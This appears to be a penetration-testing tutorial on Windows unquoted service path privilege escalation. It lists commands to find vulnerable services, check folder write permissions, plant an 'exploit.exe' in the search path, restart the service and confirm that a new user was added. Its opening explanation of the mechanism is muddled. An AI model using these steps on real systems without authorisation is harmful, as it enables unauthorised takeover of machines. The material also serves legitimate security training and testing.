Unquoted Service Paths

We can explore unquoted service paths, when we have write permissions inside an applications directory. If the service path contains spaces but doesn’t have quotes, then this may be something we can abuse by replacing the binary with one that has quotes in the correct path. This way, our binary will run instead of the unquoted one.

Windows checks them in this order:

C:\Program.exe
C:\Program Files\my.exe
C:\Program Files\My Program\my.exe
C:\Program Files\My Program\my service\my.exe

We first need to enumerate running and stopped services.

Get-CimInstance -ClassName win32_service | Select Name,State,PathName

The output will show all running and stopped services and may contain ones with spaces but no quotes. These are potential targets.

You can also enumerate these with WMI.

wmic service get name,pathname | findstr /i /v "C:\Windows\\" | findstr /i /v """

# this will return services outside of C:\Windows\ and without quotes, these are services that are potentially vulnerable to Unquoted Service paths.

We also need to understand if we can stop and start the service and permissions to write to an appropriate directory.

Start-Service ServiceName
# will confirm if you can start the service.

icacls "C:\Program Files\MyApplication"
# again, checking the next directory that Windows will check for the binary. 

We can then move the file into the appropriate location:

copy .\exploit.exe 'C:\Program Files\MyApplication\filename.exe'

Start-Service servicename
# starts service that we'd replaced the binary for.

net user
# even if it errors, it's worth checking if it created the user.

Once the service is restarted, we check that the exploit had the desired effect.